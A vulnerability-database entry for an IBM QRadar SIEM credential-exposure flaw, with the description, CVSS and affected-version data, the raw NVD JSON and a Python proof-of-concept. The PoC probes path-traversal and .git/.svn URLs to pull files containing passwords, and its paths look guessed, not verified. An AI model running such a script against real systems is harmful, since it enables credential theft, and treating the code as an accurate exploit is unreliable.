Security Vulnerability Report
CVE-2025-33119 CVSS 6.5 MEDIUM

CVE-2025-33119

Published: 2025-11-12 22:15:44
Last Modified: 2025-12-15 18:27:39

Description

IBM QRadar SIEM 7.5 through 7.5.0 UP14 stores user credentials in configuration files in source control which can be read by an authenticated user.

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:ibm:qradar_security_information_and_event_manager:7.5.0:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ibm:qradar_security_information_and_event_manager:7.5.0:update_pack_1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ibm:qradar_security_information_and_event_manager:7.5.0:update_pack_10:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ibm:qradar_security_information_and_event_manager:7.5.0:update_pack_11:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ibm:qradar_security_information_and_event_manager:7.5.0:update_pack_12:*:*:*:*:*:* - VULNERABLE
IBM QRadar SIEM 7.5 < 7.5.0 UP14
IBM QRadar SIEM 7.5.0 GA through 7.5.0 UP13

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-33119 PoC - IBM QRadar SIEM Credential Exposure
# This PoC demonstrates the credential exposure vulnerability in QRadar configuration files
import requests
import json
import base64
from urllib.parse import urljoin


class QRadarCredentialExposure:
    def __init__(self, target_url, auth_token):
        self.target_url = target_url.rstrip('/')
        self.auth_token = auth_token
        self.session = requests.Session()
        self.session.headers.update({
            'Authorization': f'Bearer {auth_token}',
            'Content-Type': 'application/json'
        })

    def check_vulnerability(self):
        """Check if the target is vulnerable to CVE-2025-33119"""
        vulnerable_paths = [
            '/console/api/server_log?filename=../config/credentials.conf',
            '/api/ariel/searches?filename=../../config/user_credentials.xml',
            '/console/qrdarun.jar?file=../../../app/qa/credentials.properties'
        ]
        exposed_credentials = []
        for path in vulnerable_paths:
            try:
                response = self.session.get(
                    urljoin(self.target_url, path),
                    timeout=10,
                    verify=False
                )
                if response.status_code == 200:
                    if 'password' in response.text.lower() or 'credential' in response.text.lower():
                        exposed_credentials.append({
                            'path': path,
                            'content': response.text,
                            'status': 'VULNERABLE'
                        })
            except Exception as e:
                print(f"Error checking {path}: {str(e)}")
        return {
            'cve_id': 'CVE-2025-33119',
            'target': self.target_url,
            'vulnerable': len(exposed_credentials) > 0,
            'exposed_data': exposed_credentials
        }

    def extract_source_control_files(self):
        """Attempt to access source control configuration files"""
        sc_paths = [
            '/api/config/backup/.git/config',
            '/console/api/system/.svn/entries',
            '/api/deployment/configs/CVE-2025-33119/credentials.conf'
        ]
        results = []
        for path in sc_paths:
            try:
                response = self.session.get(
                    urljoin(self.target_url, path),
                    timeout=10
                )
                if response.status_code == 200:
                    results.append({
                        'file_path': path,
                        'found': True,
                        'size': len(response.content)
                    })
            except Exception:
                pass
        return results


if __name__ == '__main__':
    # Usage example
    target = 'https://qradar-target.local'
    token = 'your-authentication-token'
    scanner = QRadarCredentialExposure(target, token)
    result = scanner.check_vulnerability()
    print(json.dumps(result, indent=2))

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-33119", "sourceIdentifier": "[email protected]", "published": "2025-11-12T22:15:44.247", "lastModified": "2025-12-15T18:27:38.660", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM QRadar SIEM 7.5 through 7.5.0 UP14 stores user credentials in configuration files in source control which can be read by an authenticated user."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-260"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:qradar_security_information_and_event_manager:7.5.0:-:*:*:*:*:*:*", "matchCriteriaId": "DACA17CC-8B71-4E71-B075-BFFB65AD989C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:qradar_security_information_and_event_manager:7.5.0:update_pack_1:*:*:*:*:*:*", "matchCriteriaId": "BA60FDE5-8C40-4C7A-97CF-BA2A64BF307D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:qradar_security_information_and_event_manager:7.5.0:update_pack_10:*:*:*:*:*:*", "matchCriteriaId": "3D6ADD3A-99BC-495F-9835-92D16DF18FC1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:qradar_security_information_and_event_manager:7.5.0:update_pack_11:*:*:*:*:*:*", "matchCriteriaId": "5C899CFD-26F5-43FA-A39E-7196E2929AD9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:qradar_security_information_and_event_manager:7.5.0:update_pack_12:*:*:*:*:*:*", "matchCriteriaId": 
"0C534E65-D418-4A5E-B326-F449337C0408"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:qradar_security_information_and_event_manager:7.5.0:update_pack_13:*:*:*:*:*:*", "matchCriteriaId": "A3F6494F-EC1B-4963-908A-88190E5BF835"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:qradar_security_information_and_event_manager:7.5.0:update_pack_13_interim_fix_01:*:*:*:*:*:*", "matchCriteriaId": "4779E5F6-6CA5-4EF7-8C0C-DC13362DAE45"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:qradar_security_information_and_event_manager:7.5.0:update_pack_13_interim_fix_02:*:*:*:*:*:*", "matchCriteriaId": "17894E0A-F47C-416F-99E3-26B158B5F852"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:qradar_security_information_and_event_manager:7.5.0:update_pack_14:*:*:*:*:*:*", "matchCriteriaId": "CD7E8A56-06DB-45AC-9769-4B198B142CAA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:qradar_security_information_and_event_manager:7.5.0:update_pack_2:*:*:*:*:*:*", "matchCriteriaId": "AB518E06-00BA-48F3-8AEC-6E1E97CAA2CC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:qradar_security_information_and_event_manager:7.5.0:update_pack_3:*:*:*:*:*:*", "matchCriteriaId": "289027A2-178C-45DE-A86F-1207F23D13B1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:qradar_security_information_and_event_manager:7.5.0:update_pack_4:*:*:*:*:*:*", "matchCriteriaId": "5047AECF-879B-427A-ACF7-ECB10965E1B0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:qradar_security_information_and_event_manager:7.5.0:update_pack_5:*:*:*:*:*:*", "matchCriteriaId": "CD448AB8-E3CC-41A1-9D32-B1B35C68FA5C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:qradar_security_information_and_event_manager:7.5.0:update_pack_6:*:*:*:*:*:*", "matchCriteriaId": "9F4014E8-42E2-4B76-B2DA-8B50929A4AB5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:qradar_security_information_and_event_manager:7.5.0:update_pack_7:*:*:*:*:*:*", "matchCriteriaId": "BD0A459A-C74A-4E18-83B3-4C29D47D2C2B"}, {"vulnerable": true, "criteria": 
"cpe:2.3:a:ibm:qradar_security_information_and_event_manager:7.5.0:update_pack_8:*:*:*:*:*:*", "matchCriteriaId": "721EFDD7-EE35-430C-AF17-C54BDB10434E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:qradar_security_information_and_event_manager:7.5.0:update_pack_9:*:*:*:*:*:*", "matchCriteriaId": "4C3D4D7E-0B57-47E3-BD16-5BBCE05063F5"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7250932", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}